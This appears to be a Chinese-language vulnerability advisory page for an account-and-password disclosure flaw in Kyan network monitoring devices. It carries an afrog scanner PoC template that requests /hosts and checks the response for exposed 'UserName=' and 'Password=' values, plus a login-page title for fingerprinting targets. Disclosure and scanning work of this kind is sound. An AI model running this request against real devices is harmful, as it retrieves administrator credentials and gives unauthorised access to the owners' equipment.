kyan-network-monitoring-account-password-leakage: Kyan 网络监控设备 hosts 账号密码泄露漏洞

日期: 2025-09-01 | 影响软件: Kyan网络监控设备 | POC: 已公开

漏洞描述

Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限 title="platform - Login"

PoC代码[已公开]

id: kyan-network-monitoring-account-password-leakage

info:
    name: Kyan 网络监控设备 hosts 账号密码泄露漏洞
    author: B1anda0(https://github.com/B1anda0)
    severity: high
    verified: true
    description: |
        Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限
        title="platform - Login"
    reference:
        - http://wiki.peiqi.tech/wiki/iot/Kyan/Kyan%20%E7%BD%91%E7%BB%9C%E7%9B%91%E6%8E%A7%E8%AE%BE%E5%A4%87%20hosts%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html

rules:
    r0:
        request:
            method: GET
            path: /hosts
        expression: response.status == 200 && response.body.bcontains(b'UserName=') && response.body.bcontains(b'Password=')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/disclosure/kyan-network-monitoring-account-password-leakage.yaml

相关漏洞推荐